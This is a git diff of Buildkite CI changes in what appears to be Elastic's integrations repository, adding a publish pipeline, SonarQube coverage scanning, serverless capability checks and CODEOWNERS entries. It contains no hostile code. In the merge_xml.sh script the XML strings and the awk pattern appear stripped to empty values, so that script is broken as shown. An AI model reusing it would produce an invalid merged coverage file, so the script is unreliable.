diff --git a/.buildkite/hooks/pre-command b/.buildkite/hooks/pre-command index 0d394803245..c9b5182c6d1 100755 --- a/.buildkite/hooks/pre-command +++ b/.buildkite/hooks/pre-command @@ -12,6 +12,7 @@ export UPLOAD_SAFE_LOGS=${UPLOAD_SAFE_LOGS:-"0"} export SERVERLESS=${SERVERLESS:-"false"} export STACK_VERSION=${STACK_VERSION:-""} export FORCE_CHECK_ALL=${FORCE_CHECK_ALL:-"false"} +export PUBLISH_COVERAGE_REPORTS=${PUBLISH_COVERAGE_REPORTS:-"false"} BASE_DIR=$(pwd) export BASE_DIR @@ -37,13 +38,52 @@ GITHUB_TOKEN_VAULT_PATH=kv/ci-shared/platform-ingest/github_token EC_TOKEN_PATH=kv/ci-shared/platform-ingest/platform-ingest-ec-qa EC_DATA_PATH=secret/ci/elastic-integrations/ec_data +# variables required for terraform +export ENVIRONMENT="ci" +export REPO="${REPO_NAME}" + +branch_name_label() { + local branch="$1" + + if [[ "${BUILDKITE_PULL_REQUEST}" != "false" ]] ; then + # remove fork from branch name + branch=$(echo $branch | cut -d : -f 2) + fi + + # From Jenkins + # BRANCH_NAME_LOWER_CASE = "${env.BRANCH_NAME.toLowerCase().replaceAll('[^a-z0-9-]', '-')}" + # to lower case and replace characters + branch=$(echo "$branch" | tr '[:upper:]' '[:lower:]' | tr '_/\:. ' '-') + + # truncate up to 63 characters limit + echo $branch | head -c 63 +} + +BRANCH_NAME_LOWER_CASE=$(branch_name_label "$BUILDKITE_BRANCH") +export BRANCH_NAME_LOWER_CASE +# This variable contains the build number https://buildkite.com/elastic/elastic-package/ +export BUILD_ID="${BUILDKITE_BUILD_NUMBER}" +# get current timestamp in milliseconds +# From Jenkins +# CREATED_DATE = "${new Date().getTime()}" +CREATED_DATE=$(date +%s%3N) +export CREATED_DATE + if [ -n "${ELASTIC_PACKAGE_LINKS_FILE_PATH+x}" ]; then # first upload pipeline does not have the environment variables defined in the YAML export ELASTIC_PACKAGE_LINKS_FILE_PATH=${BASE_DIR}/${ELASTIC_PACKAGE_LINKS_FILE_PATH} fi +if [[ "${BUILDKITE_PIPELINE_SLUG}" == "integrations-publish" ]]; then + if [[ "${BUILDKITE_STEP_KEY}" == "trigger-publish" ]]; then + BUILDKITE_API_TOKEN=$(retry 5 vault kv get -field buildkite_token ${BUILDKITE_API_TOKEN_PATH}) + export BUILDKITE_API_TOKEN + fi +fi + if [[ "${BUILDKITE_PIPELINE_SLUG}" == "integrations" ]]; then if [[ "${BUILDKITE_STEP_KEY}" == "trigger-publish" ]]; then + # TODO: To be removed BUILDKITE_API_TOKEN=$(retry 5 vault kv get -field buildkite_token ${BUILDKITE_API_TOKEN_PATH}) export BUILDKITE_API_TOKEN fi diff --git a/.buildkite/pipeline.publish.yml b/.buildkite/pipeline.publish.yml new file mode 100644 index 00000000000..ba49e5edda1 --- /dev/null +++ b/.buildkite/pipeline.publish.yml @@ -0,0 +1,49 @@ +# yaml-language-server: $schema=https://raw.githubusercontent.com/buildkite/pipeline-schema/main/schema.json + +env: + SETUP_GVM_VERSION: "v0.5.2" + LINUX_AGENT_IMAGE: "golang:${GO_VERSION}" + DOCKER_COMPOSE_VERSION: "v2.24.1" + DOCKER_VERSION: "false" + YQ_VERSION: 'v4.35.2' + JQ_VERSION: '1.7' + # Elastic package settings + # Manage docker output/logs + ELASTIC_PACKAGE_COMPOSE_DISABLE_ANSI: "true" + ELASTIC_PACKAGE_COMPOSE_DISABLE_PULL_PROGRESS_INFORMATION: "true" + # Default license to use by `elastic-package build` + ELASTIC_PACKAGE_REPOSITORY_LICENSE: "licenses/Elastic-2.0.txt" + # Link definitions path (full path to be set in the corresponding step) + ELASTIC_PACKAGE_LINKS_FILE_PATH: "links_table.yml" + # Disable comparison of results in pipeline tests to avoid errors related to GeoIP fields + ELASTIC_PACKAGE_SERVERLESS_PIPELINE_TEST_DISABLE_COMPARE_RESULTS: "true" + NOTIFY_TO: "ecosystem-team@elastic.co" + +steps: + - label: ":white_check_mark: Check go sources" + key: "check" + command: ".buildkite/scripts/check_sources.sh" + agents: + image: "${LINUX_AGENT_IMAGE}" + cpu: "8" + memory: "4G" + + - label: ":package: Build packages" + key: "build-packages" + command: ".buildkite/scripts/build_packages.sh" + agents: + image: "${LINUX_AGENT_IMAGE}" + cpu: "8" + memory: "8G" + env: + ARTIFACTS_FOLDER: "artifacts-to-sign" + DRY_RUN: "true" + depends_on: + - step: "check" + allow_failure: false + artifact_paths: + - artifacts-to-sign/*.zip + +notify: + - email: "$NOTIFY_TO" + if: "build.state == 'failed' && build.env('BUILDKITE_PULL_REQUEST') == 'false'" diff --git a/.buildkite/pipeline.schedule-daily.yml b/.buildkite/pipeline.schedule-daily.yml index fef5d4c7943..00ca5f1d33c 100644 --- a/.buildkite/pipeline.schedule-daily.yml +++ b/.buildkite/pipeline.schedule-daily.yml @@ -22,19 +22,21 @@ steps: SERVERLESS: "false" SKIP_PUBLISHING: "true" FORCE_CHECK_ALL: "true" - STACK_VERSION: 7.17-SNAPSHOT + # STACK_VERSION: 7.17-SNAPSHOT # Using 7.17.19 till https://github.com/elastic/fleet-server/issues/3435 is solved. + STACK_VERSION: 7.17.19 depends_on: - step: "check" allow_failure: false - - label: "Check integrations local stacks - Stack Version v8.12" + - label: "Check integrations local stacks - Stack Version v8.14" trigger: "integrations" build: env: SERVERLESS: "false" SKIP_PUBLISHING: "true" FORCE_CHECK_ALL: "true" - STACK_VERSION: 8.12-SNAPSHOT + STACK_VERSION: 8.14.0-SNAPSHOT + PUBLISH_COVERAGE_REPORTS: "true" depends_on: - step: "check" allow_failure: false @@ -58,3 +60,10 @@ steps: depends_on: - step: "check" allow_failure: false + + - label: ":package: Publish missing packages" + key: "trigger-integrations-publish" + trigger: "integrations-publish" + depends_on: + - step: "check" + allow_failure: false diff --git a/.buildkite/pipeline.serverless.yml b/.buildkite/pipeline.serverless.yml index b9a94a0396f..b77b7c7fce8 100644 --- a/.buildkite/pipeline.serverless.yml +++ b/.buildkite/pipeline.serverless.yml @@ -1,7 +1,7 @@ # yaml-language-server: $schema=https://raw.githubusercontent.com/buildkite/pipeline-schema/main/schema.json env: - SETUP_GVM_VERSION: "v0.5.1" + SETUP_GVM_VERSION: "v0.5.2" LINUX_AGENT_IMAGE: "golang:${GO_VERSION}" DOCKER_COMPOSE_VERSION: "v2.24.1" DOCKER_VERSION: "false" diff --git a/.buildkite/pipeline.yml b/.buildkite/pipeline.yml index 3f37cb011f4..df3e5f0c778 100644 --- a/.buildkite/pipeline.yml +++ b/.buildkite/pipeline.yml @@ -1,7 +1,7 @@ # yaml-language-server: $schema=https://raw.githubusercontent.com/buildkite/pipeline-schema/main/schema.json env: - SETUP_GVM_VERSION: "v0.5.1" + SETUP_GVM_VERSION: "v0.5.2" LINUX_AGENT_IMAGE: "golang:${GO_VERSION}" DOCKER_COMPOSE_VERSION: "v2.24.1" DOCKER_VERSION: "false" @@ -67,6 +67,15 @@ steps: cpu: "8" memory: "4G" + - label: ":sonarqube: Continuous Code Inspection" + env: + VAULT_SONAR_TOKEN_PATH: "kv/ci-shared/platform-ingest/elastic/integrations/sonar-analyze-token" + agents: + image: "docker.elastic.co/cloud-ci/sonarqube/buildkite-scanner:latest" + command: ".buildkite/scripts/run_sonar_scanner.sh" + artifact_paths: + - build/test-coverage/coverage_merged.xml + - label: ":junit: Junit annotate" plugins: - junit-annotate#v2.4.1: diff --git a/.buildkite/pull-requests.json b/.buildkite/pull-requests.json index d5981deec5d..2a3aa98cbef 100644 --- a/.buildkite/pull-requests.json +++ b/.buildkite/pull-requests.json @@ -47,6 +47,22 @@ "skip_target_branches": [], "skip_ci_on_only_changed": [], "always_require_ci_on_changed": [] + }, + { + "enabled": false, + "pipelineSlug": "integrations-publish", + "allow_org_users": true, + "allowed_repo_permissions": ["admin", "write"], + "allowed_list": [], + "set_commit_status": false, + "build_on_commit": false, + "build_on_comment": false, + "trigger_comment_regex": "", + "always_trigger_comment_regex": "", + "skip_ci_labels": [], + "skip_target_branches": [], + "skip_ci_on_only_changed": [], + "always_require_ci_on_changed": [] } ] } diff --git a/.buildkite/scripts/backport_branch.sh b/.buildkite/scripts/backport_branch.sh index 4481c1cd325..ef3ebc96c29 100755 --- a/.buildkite/scripts/backport_branch.sh +++ b/.buildkite/scripts/backport_branch.sh @@ -84,6 +84,7 @@ removeOtherPackages() { updateBackportBranchContents() { local BUILDKITE_FOLDER_PATH=".buildkite" local JENKINS_FOLDER_PATH=".ci" + local files_cached_num="" if git ls-tree -d --name-only main:.ci >/dev/null 2>&1; then git checkout $BACKPORT_BRANCH_NAME echo "Copying $BUILDKITE_FOLDER_PATH from $SOURCE_BRANCH..." @@ -108,15 +109,26 @@ updateBackportBranchContents() { git config --global user.name "${GITHUB_USERNAME_SECRET}" git config --global user.email "${GITHUB_EMAIL_SECRET}" + echo "Commiting" + git add $BUILDKITE_FOLDER_PATH + if [ -d "${JENKINS_FOLDER_PATH}" ]; then + git add $JENKINS_FOLDER_PATH + fi + git add $PACKAGES_FOLDER_PATH/ + git status + + files_cached_num=$(git diff --name-only --cached | wc -l) + if [ "${files_cached_num}" -gt 0 ]; then + git commit -m "Add $BUILDKITE_FOLDER_PATH and $JENKINS_FOLDER_PATH to backport branch: $BACKPORT_BRANCH_NAME from the $SOURCE_BRANCH branch" + else + echo "Nothing to commit, skip." + fi + if [ "$DRY_RUN" == "true" ];then echo "DRY_RUN mode, nothing will be pushed." git diff $SOURCE_BRANCH...$BACKPORT_BRANCH_NAME else - echo "Commiting and pushing..." - git add $BUILDKITE_FOLDER_PATH - git add $JENKINS_FOLDER_PATH - git add $PACKAGES_FOLDER_PATH/ - git commit -m "Add $BUILDKITE_FOLDER_PATH and $JENKINS_FOLDER_PATH to backport branch: $BACKPORT_BRANCH_NAME from the $SOURCE_BRANCH branch" + echo "Pushing..." git push origin $BACKPORT_BRANCH_NAME fi } @@ -152,15 +164,15 @@ if branchExist "$BACKPORT_BRANCH_NAME"; then fi # backport branch does not exist, running checks and create branch -echo "Check the entered version and PACKAGE_VERSION are equal" -version="$(cat packages/${PACKAGE_NAME}/manifest.yml | yq -r .version)" +version="$(git show "${BASE_COMMIT}":"packages/${PACKAGE_NAME}/manifest.yml" | yq -r .version)" +echo "Check if version from ${BASE_COMMIT} (${version}) matches with version from input step ${PACKAGE_VERSION}" if [[ "${version}" != "${PACKAGE_VERSION}" ]]; then buildkite-agent annotate "Unexpected version found in packages/${PACKAGE_NAME}/manifest.yml" --style "error" exit 1 fi echo "Check that this changeset is the one creating the version $PACKAGE_NAME" -if ! git show -p ${BASE_COMMIT} packages/${PACKAGE_NAME}/manifest.yml | grep -E "^\+version: ${PACKAGE_VERSION}" ; then +if ! git show -p ${BASE_COMMIT} packages/${PACKAGE_NAME}/manifest.yml | grep -E "^\+version: \"{0,1}${PACKAGE_VERSION}" ; then buildkite-agent annotate "This changeset does not creates the version ${PACKAGE_VERSION}" --style "error" exit 1 fi @@ -172,4 +184,7 @@ MSG="The backport branch: **$BACKPORT_BRANCH_NAME** has been created." echo "Adding CI files into the branch ${BACKPORT_BRANCH_NAME}" updateBackportBranchContents +if [ "${DRY_RUN}" == "true" ]; then + MSG="[DRY_RUN] ${MSG}." +fi buildkite-agent annotate "$MSG" --style "success" diff --git a/.buildkite/scripts/common.sh b/.buildkite/scripts/common.sh index 350cc54fd29..37dfdfc7565 100755 --- a/.buildkite/scripts/common.sh +++ b/.buildkite/scripts/common.sh @@ -15,6 +15,8 @@ export ELASTIC_PACKAGE_BIN=${WORKSPACE}/build/elastic-package API_BUILDKITE_PIPELINES_URL="https://api.buildkite.com/v2/organizations/elastic/pipelines/" +COVERAGE_FORMAT="generic" +COVERAGE_OPTIONS="--test-coverage --coverage-format=${COVERAGE_FORMAT}" running_on_buildkite() { if [[ "${BUILDKITE:-"false"}" == "true" ]]; then @@ -331,15 +333,90 @@ kibana_version_manifest() { } capabilities_manifest() { - cat manifest.yml | yq ".conditions.elastic.capabilities" + # 1) Expected format + # conditions: + # elastic: + # capabilities: + # - observability + # - uptime + # expected output: + # "observability" + # "uptime" + # 2) Expected format + # conditions: + # elastic: + # capabilities: [observability, uptime] + # expected output: + # "observability" + # "uptime" + local capabilities="" + capabilities=$(cat manifest.yml | yq -M -r -o json ".conditions.elastic.capabilities") + if [[ "$capabilities" != "null" ]]; then + echo "$capabilities" | jq '.[]' + return + fi + echo "$capabilities" +} + +capabilities_in_kibana() { + # Expected format + # xpack.fleet.internal.registry.capabilities: [ + # 'apm', + # 'observability', + # 'uptime', + # ] + # Expected output: + # "apm" + # "observability" + # "uptime" + cat "${KIBANA_CONFIG_FILE_PATH}" | yq -M -r -o json '."xpack.fleet.internal.registry.capabilities"' | jq '.[]' +} + +packages_excluded() { + # Expected format: + # xpack.fleet.internal.registry.excludePackages: [ + # # Security integrations + # 'endpoint', + # 'beaconing', + # 'osquery_manager', + # ] + # required double quotes to ensure that the package is checked (e.g. synthetics synthetics_dashboard) + # excluded_packages must be: + # "endpoint" + # "beaconing" + # "osquery_manager" + local config_file_path=$1 + local excluded_packages="" + excluded_packages=$(cat "${config_file_path}" | yq -M -r -o json '."xpack.fleet.internal.registry.excludePackages"') + if [[ "${excluded_packages}" != "null" ]]; then + echo "${excluded_packages}" | jq '.[]' + return + fi + echo "${excluded_packages}" +} + +is_package_excluded() { + local package=$1 + local config_file_path=$2 + local excluded_packages="" + + excluded_packages=$(packages_excluded "${config_file_path}") + if [[ "${excluded_packages}" == "null" ]]; then + return 1 + fi + if echo "${excluded_packages}" | grep -q -E "\"${package}\""; then + return 0 + fi + return 1 } + is_supported_capability() { if [ "${SERVERLESS_PROJECT}" == "" ]; then return 0 fi - local capabilities + local capabilities="" capabilities=$(capabilities_manifest) # if no capabilities defined, it is available iavailable all projects @@ -347,23 +424,24 @@ is_supported_capability() { return 0 fi - if [[ ${SERVERLESS_PROJECT} == "observability" ]]; then - if echo "${capabilities}" | grep -E 'apm|observability|uptime' ; then - return 0 - else - return 1 - fi + local capabilities_kibana_grep="" + + capabilities_kibana_grep=$(capabilities_in_kibana | tr -d '\n' | sed 's/""/"|"/g') + # Expected value of "capabilities_kibana" + # "apm"|"observability"|"uptime" + + # if there is no key defined in kibana, allow to be tested + if [[ ${capabilities_kibana_grep} == "null" ]]; then + return 0 fi - if [[ ${SERVERLESS_PROJECT} == "security" ]]; then - if echo "${capabilities}" | grep -E 'security' ; then - return 0 - else + for cap in ${capabilities}; do + if ! echo "${cap}" | grep -q -E "${capabilities_kibana_grep}"; then return 1 fi - fi + done - return 1 + return 0 } is_supported_stack() { @@ -570,7 +648,7 @@ is_pr_affected() { local from=${2:-""} local to=${3:-""} - echo "[${package}] Original commits: from '${from}' - to: '${to}'" + echoerr "[${package}] Original commits: from '${from}' - to: '${to}'" if ! is_supported_stack ; then echo "[${package}] PR is not affected: unsupported stack (${STACK_VERSION})" @@ -578,6 +656,10 @@ is_pr_affected() { fi if is_serverless; then + if is_package_excluded "${package}" "${WORKSPACE}/kibana.serverless.config.yml"; then + echo "[${package}] PR is not affected: package ${package} excluded in Kibana config for ${SERVERLESS_PROJECT}" + return 1 + fi if ! is_supported_capability ; then echo "[${package}] PR is not affected: capabilities not mached with the project (${SERVERLESS_PROJECT})" return 1 @@ -685,11 +767,11 @@ install_package() { test_package_in_local_stack() { local package=$1 - TEST_OPTIONS="-v --report-format xUnit --report-output file --test-coverage" + TEST_OPTIONS="-v --report-format xUnit --report-output file" echo "Test package: ${package}" # Run all test suites - ${ELASTIC_PACKAGE_BIN} test ${TEST_OPTIONS} + ${ELASTIC_PACKAGE_BIN} test ${TEST_OPTIONS} ${COVERAGE_OPTIONS} local ret=$? echo "" return $ret @@ -703,10 +785,10 @@ test_package_in_serverless() { TEST_OPTIONS="-v --report-format xUnit --report-output file" echo "Test package: ${package}" - if ! ${ELASTIC_PACKAGE_BIN} test asset ${TEST_OPTIONS} --test-coverage ; then + if ! ${ELASTIC_PACKAGE_BIN} test asset ${TEST_OPTIONS} ${COVERAGE_OPTIONS}; then return 1 fi - if ! ${ELASTIC_PACKAGE_BIN} test static ${TEST_OPTIONS} --test-coverage ; then + if ! ${ELASTIC_PACKAGE_BIN} test static ${TEST_OPTIONS} ${COVERAGE_OPTIONS}; then return 1 fi # FIXME: adding test-coverage for serverless results in errors like this: diff --git a/.buildkite/scripts/find_oldest_supported_version.py b/.buildkite/scripts/find_oldest_supported_version.py index 75950ad019c..82662a84f6d 100644 --- a/.buildkite/scripts/find_oldest_supported_version.py +++ b/.buildkite/scripts/find_oldest_supported_version.py @@ -18,7 +18,9 @@ def find_oldest_supported_version(kibana_version_condition: str) -> str: if "||" in kibana_version_condition and kibana_version_condition.index("||") >= 0: return handle_or(kibana_version_condition) - available_versions = fetch_version() + artifacts_versions = fetch_version() + available_versions = artifacts_versions.get("versions", []) + available_aliases = artifacts_versions.get("aliases", []) version = remove_operator(kibana_version_condition) parts = version.split(".") @@ -32,22 +34,22 @@ def find_oldest_supported_version(kibana_version_condition: str) -> str: # Use the snapshot if this is the last patch version. next_patch = ".".join((major, minor, str(int(patch)+1))) next_patch_exists = ( - next_patch in available_versions.get("versions", []) or - f"{next_patch}-SNAPSHOT" in available_versions.get("versions", []) + next_patch in available_versions or + f"{next_patch}-SNAPSHOT" in available_versions ) snapshot_version = f"{version}-SNAPSHOT" - if not next_patch_exists and (snapshot_version in available_versions.get("versions", [])): + if not next_patch_exists and (snapshot_version in available_versions): return snapshot_version # Use the version as is if it exists. - if version in available_versions.get("version", []): + if version in available_versions: return version # Old minors may not be available in artifacts-api, if it is older # than the others in the same major, return the version as is. older = True - for available_version in available_versions.get("versions", []): + for available_version in available_versions: available_parts = available_version.split(".") if len(available_parts) < 2: continue @@ -63,7 +65,7 @@ def find_oldest_supported_version(kibana_version_condition: str) -> str: # If no version has been found so far, try with the snapshot of the next version # in the current major. major_snapshot = f"{major}.x-SNAPSHOT" - if major_snapshot in available_versions.get("aliases", []): + if major_snapshot in available_aliases: return major_snapshot # Otherwise, return it, whatever this is. diff --git a/.buildkite/scripts/merge_xml.sh b/.buildkite/scripts/merge_xml.sh new file mode 100755 index 00000000000..01d910d4394 --- /dev/null +++ b/.buildkite/scripts/merge_xml.sh @@ -0,0 +1,29 @@ +#!/bin/bash + +set -euo pipefail + +# Script to merge all the coverage XML files into just one file. +# It supports XML files using generic test coverage report format: +# https://docs.sonarsource.com/sonarqube/9.8/analyzing-source-code/test-coverage/generic-test-data/#generic-test-coverage + +sourceFolder="build/test-coverage" +mergedCoverageFileName="coverage_merged.xml" + +pushd "${sourceFolder}" > /dev/null +echo "Generating ${mergedCoverageFileName} into ${sourceFolder}..." +echo '' > "${mergedCoverageFileName}" +echo '' >> "${mergedCoverageFileName}" + +for file in coverage-*.xml; do + if [[ "$file" == "${mergedCoverageFileName}" ]]; then + continue + fi + echo " - Adding ${file}" + sed '1d;$d' "$file" | awk '//' >> "${mergedCoverageFileName}" +done + +echo '' >> "${mergedCoverageFileName}" +echo 'Done' + +popd > /dev/null + diff --git a/.buildkite/scripts/run_sonar_scanner.sh b/.buildkite/scripts/run_sonar_scanner.sh new file mode 100755 index 00000000000..55650d26ee7 --- /dev/null +++ b/.buildkite/scripts/run_sonar_scanner.sh @@ -0,0 +1,36 @@ +#!/bin/bash +set -euo pipefail + +run_sonar_scanner() { + local message="" + echo "--- Download coverage reports and merge them" + if ! buildkite-agent artifact download build/test-coverage/coverage-*.xml . ; then + message="Could not download XML artifacts. Skip coverage." + echo "--- :boom: ${message}" + buildkite-agent annotate \ + "[Code inspection] ${message}" \ + --context "ctx-sonarqube-no-files" \ + --style "warning" + exit 0 + fi + + echo "Merge all coverage reports" + .buildkite/scripts/merge_xml.sh + + echo "--- Execute sonar scanner CLI" + /scan-source-code.sh +} + +if [[ "${PUBLISH_COVERAGE_REPORTS:-"false"}" == "true" ]]; then + echo "Enabled sonnar scanner by PUBLISH_COVERAGE_REPORTS variable (Pipeline ${BUILDKITE_PIPELINE_SLUG})" + run_sonar_scanner + exit 0 +fi + +if [[ "${BUILDKITE_PULL_REQUEST}" != "false" ]]; then + echo "Run sonar scanner from Pull Request (Pipeline ${BUILDKITE_PIPELINE_SLUG})" + run_sonar_scanner + exit 0 +fi + +echo "Skip coverage report" diff --git a/.buildkite/scripts/test_integrations_with_serverless.sh b/.buildkite/scripts/test_integrations_with_serverless.sh index de362c7d759..3a438fad2d1 100755 --- a/.buildkite/scripts/test_integrations_with_serverless.sh +++ b/.buildkite/scripts/test_integrations_with_serverless.sh @@ -27,6 +27,14 @@ if running_on_buildkite; then buildkite-agent annotate "Serverless Project: ${SERVERLESS_PROJECT}" --context "ctx-info-${SERVERLESS_PROJECT}" --style "info" fi +# Download config files from kibana +kibana_url="https://raw.githubusercontent.com/elastic/kibana/main/config/serverless.oblt.yml" +if [[ "$SERVERLESS_PROJECT" == "security" ]]; then + kibana_url="https://raw.githubusercontent.com/elastic/kibana/main/config/serverless.security.yml" +fi +export KIBANA_CONFIG_FILE_PATH="${WORKSPACE}/kibana.serverless.config.yml" +curl -sSL -o "${KIBANA_CONFIG_FILE_PATH}" "${kibana_url}" + if [ ! -d packages ]; then echo "Missing packages folder" if running_on_buildkite ; then diff --git a/.buildkite/scripts/trigger_integrations_in_parallel.sh b/.buildkite/scripts/trigger_integrations_in_parallel.sh index 1466f399aa8..e7433a0d2d4 100755 --- a/.buildkite/scripts/trigger_integrations_in_parallel.sh +++ b/.buildkite/scripts/trigger_integrations_in_parallel.sh @@ -59,6 +59,7 @@ for package in ${PACKAGE_LIST}; do UPLOAD_SAFE_LOGS: ${UPLOAD_SAFE_LOGS} artifact_paths: - build/test-results/*.xml + - build/test-coverage/*.xml - build/benchmark-results/*.json - build/elastic-stack-dump/*/logs/*.log - build/elastic-stack-dump/*/logs/fleet-server-internal/**/* diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 59df894e173..90c974ce35a 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -72,6 +72,8 @@ /packages/azure/data_stream/provisioning @elastic/obs-infraobs-integrations /packages/azure/data_stream/signinlogs @elastic/obs-infraobs-integrations /packages/azure/data_stream/springcloudlogs @elastic/obs-infraobs-integrations +/packages/azure/data_stream/application_gateway @elastic/security-service-integrations +/packages/azure/data_stream/firewall_logs @elastic/security-service-integrations /packages/azure_app_service @elastic/obs-infraobs-integrations /packages/azure_app_service/data_stream/app_service_logs @elastic/obs-infraobs-integrations /packages/azure_application_insights @elastic/obs-infraobs-integrations @@ -108,6 +110,7 @@ /packages/cel @elastic/security-service-integrations /packages/ceph @elastic/obs-infraobs-integrations /packages/checkpoint @elastic/sec-deployment-and-devices +/packages/cisa_kevs @elastic/security-service-integrations /packages/cisco_aironet @elastic/sec-deployment-and-devices /packages/cisco_asa @elastic/sec-deployment-and-devices /packages/cisco_duo @elastic/security-service-integrations @@ -194,6 +197,7 @@ /packages/ibmmq @elastic/obs-infraobs-integrations /packages/iis @elastic/obs-infraobs-integrations /packages/imperva @elastic/sec-deployment-and-devices +/packages/imperva_cloud_waf @elastic/security-service-integrations /packages/influxdb @elastic/obs-infraobs-integrations /packages/infoblox @elastic/security-service-integrations /packages/infoblox_bloxone_ddi @elastic/security-service-integrations @@ -218,14 +222,17 @@ /packages/lmd @elastic/ml-ui @elastic/sec-applied-ml /packages/log @elastic/elastic-agent-data-plane /packages/logstash @elastic/stack-monitoring +/packages/lumos @elastic/security-service-integrations /packages/lyve_cloud @elastic/security-service-integrations /packages/m365_defender @elastic/security-service-integrations /packages/mattermost @elastic/security-service-integrations /packages/memcached @elastic/obs-infraobs-integrations +/packages/menlo @elastic/security-service-integrations /packages/microsoft_defender_cloud @elastic/security-service-integrations /packages/microsoft_defender_endpoint @elastic/security-service-integrations /packages/microsoft_dhcp @elastic/sec-windows-platform /packages/microsoft_exchange_online_message_trace @elastic/security-service-integrations +/packages/microsoft_exchange_server @elastic/sec-windows-platform /packages/microsoft_sqlserver @elastic/obs-infraobs-integrations /packages/mimecast @elastic/security-service-integrations /packages/modsecurity @elastic/sec-deployment-and-devices @@ -254,6 +261,7 @@ /packages/ping_one @elastic/security-service-integrations /packages/platform_observability @elastic/stack-monitoring /packages/postgresql @elastic/obs-infraobs-integrations +/packages/pps @elastic/security-service-integrations /packages/prisma_cloud @elastic/security-service-integrations /packages/problemchild @elastic/ml-ui @elastic/sec-applied-ml /packages/prometheus @elastic/obs-infraobs-integrations @@ -308,6 +316,7 @@ /packages/ti_crowdstrike @elastic/security-service-integrations /packages/ti_cybersixgill @elastic/security-service-integrations /packages/ti_eclecticiq @elastic/security-service-integrations +/packages/ti_eset @elastic/security-service-integrations /packages/ti_maltiverse @elastic/security-service-integrations /packages/ti_mandiant_advantage @elastic/security-service-integrations /packages/ti_misp @elastic/security-service-integrations @@ -315,6 +324,7 @@ /packages/ti_otx @elastic/security-service-integrations /packages/ti_rapid7_threat_command @elastic/security-service-integrations /packages/ti_recordedfuture @elastic/security-service-integrations +/packages/ti_threatconnect @elastic/security-service-integrations /packages/ti_threatq @elastic/security-service-integrations /packages/ti_util @elastic/security-service-integrations /packages/tines @elastic/security-service-integrations @@ -323,7 +333,7 @@ /packages/trellix_edr_cloud @elastic/security-service-integrations /packages/trellix_epo_cloud @elastic/security-service-integrations /packages/trend_micro_vision_one @elastic/security-service-integrations -/packages/trendmicro @elastic/sec-deployment-and-devices +/packages/trendmicro @elastic/security-service-integrations /packages/udp @elastic/sec-deployment-and-devices /packages/universal_profiling_agent @elastic/profiling /packages/universal_profiling_collector @elastic/profiling @@ -342,6 +352,7 @@ /packages/windows/data_stream/powershell_operational @elastic/sec-windows-platform /packages/windows/data_stream/service @elastic/elastic-agent-data-plane /packages/windows/data_stream/sysmon_operational @elastic/sec-windows-platform +/packages/windows_etw @elastic/sec-windows-platform /packages/winlog @elastic/sec-windows-platform /packages/wiz @elastic/security-service-integrations /packages/zeek @elastic/sec-deployment-and-devices @@ -351,3 +362,4 @@ /packages/zoom @elastic/security-service-integrations /packages/zscaler_zia @elastic/security-service-integrations /packages/zscaler_zpa @elastic/security-service-integrations +/packages/jamf_protect @elastic/security-service-integrations diff --git a/.gitignore b/.gitignore index e4e354135dd..f0a3e41966f 100644 --- a/.gitignore +++ b/.gitignore @@ -6,3 +6,6 @@ dev/packages elastic-package + +# Folder created by the Sonar Scanner +.scannerwork/ diff --git a/.go-version b/.go-version index 2844977405c..6fee2fedb0a 100644 --- a/.go-version +++ b/.go-version @@ -1 +1 @@ -1.21.1 +1.22.2 diff --git a/catalog-info.yaml b/catalog-info.yaml index 0c8ab2ab769..58de250ff58 100644 --- a/catalog-info.yaml +++ b/catalog-info.yaml @@ -199,3 +199,47 @@ spec: access_level: MANAGE_BUILD_AND_READ everyone: access_level: BUILD_AND_READ + +--- +# yaml-language-server: $schema=https://gist.githubusercontent.com/elasticmachine/988b80dae436cafea07d9a4a460a011d/raw/e57ee3bed7a6f73077a3f55a38e76e40ec87a7cf/rre.schema.json +apiVersion: backstage.io/v1alpha1 +kind: Resource +metadata: + name: buildkite-pipeline-integrations-publish + description: 'Pipeline for the Integrations project to publish packages' + links: + - title: Pipeline + url: https://buildkite.com/elastic/integrations-publish + +spec: + type: buildkite-pipeline + owner: group:ingest-fp + system: buildkite + implementation: + apiVersion: buildkite.elastic.dev/v1 + kind: Pipeline + metadata: + name: integrations-publish + description: 'Pipeline for the Integrations project to publish packages' + spec: + # TODO: add backport-* in `branch_configuration` when these brances are updated + # branch_configuration: "main backport-*" + branch_configuration: "main" + pipeline_file: ".buildkite/pipeline.publish.yml" + provider_settings: + build_pull_request_forks: false + build_pull_requests: false # requires filter_enabled and filter_condition settings as below when used with buildkite-pr-bot + build_tags: false + filter_enabled: true + filter_condition: >- + build.pull_request.id == null || (build.creator.name == 'elasticmachine' && build.pull_request.id != null) + repository: elastic/integrations + cancel_intermediate_builds: true + cancel_intermediate_builds_branch_filter: '!main !backport-*' + skip_intermediate_builds: true + skip_intermediate_builds_branch_filter: '!main !backport-*' + teams: + ingest-fp: + access_level: MANAGE_BUILD_AND_READ + everyone: + access_level: READ_ONLY diff --git a/dev/codeowners/codeowners.go b/dev/codeowners/codeowners.go index 08a95f53672..95cd03d51df 100644 --- a/dev/codeowners/codeowners.go +++ b/dev/codeowners/codeowners.go @@ -8,12 +8,10 @@ import ( "bufio" "fmt" "io/fs" - "io/ioutil" "os" "path/filepath" "strings" - "github.com/pkg/errors" "gopkg.in/yaml.v2" ) @@ -51,7 +49,7 @@ type githubOwners struct { func readGithubOwners(codeownersPath string) (*githubOwners, error) { f, err := os.Open(codeownersPath) if err != nil { - return nil, errors.Wrapf(err, "failed to open %q", codeownersPath) + return nil, fmt.Errorf("failed to open %q: %w", codeownersPath, err) } defer f.Close() @@ -82,7 +80,7 @@ func readGithubOwners(codeownersPath string) (*githubOwners, error) { codeowners.owners[path] = owners } if err := scanner.Err(); err != nil { - return nil, errors.Wrapf(err, "scanner error") + return nil, fmt.Errorf("scanner error: %w", err) } return &codeowners, nil @@ -128,7 +126,7 @@ func (codeowners *githubOwners) checkManifest(path string) error { return fmt.Errorf("there is no owner for %q in %q", pkgDir, codeowners.path) } - content, err := ioutil.ReadFile(path) + content, err := os.ReadFile(path) if err != nil { return err } diff --git a/docs/generic_guidelines.md b/docs/generic_guidelines.md index 2f3d60e4646..ae2119a56ea 100644 --- a/docs/generic_guidelines.md +++ b/docs/generic_guidelines.md @@ -18,6 +18,21 @@ Starting with ECS 1.6, ECS is going to start using Basic types for some fields. All fields produced by an integration must be mapped by `fields.yml`. This guarantees that their index mapping is correct, and Kibana has enough info to deal with all fields. +##### Field limits + +By 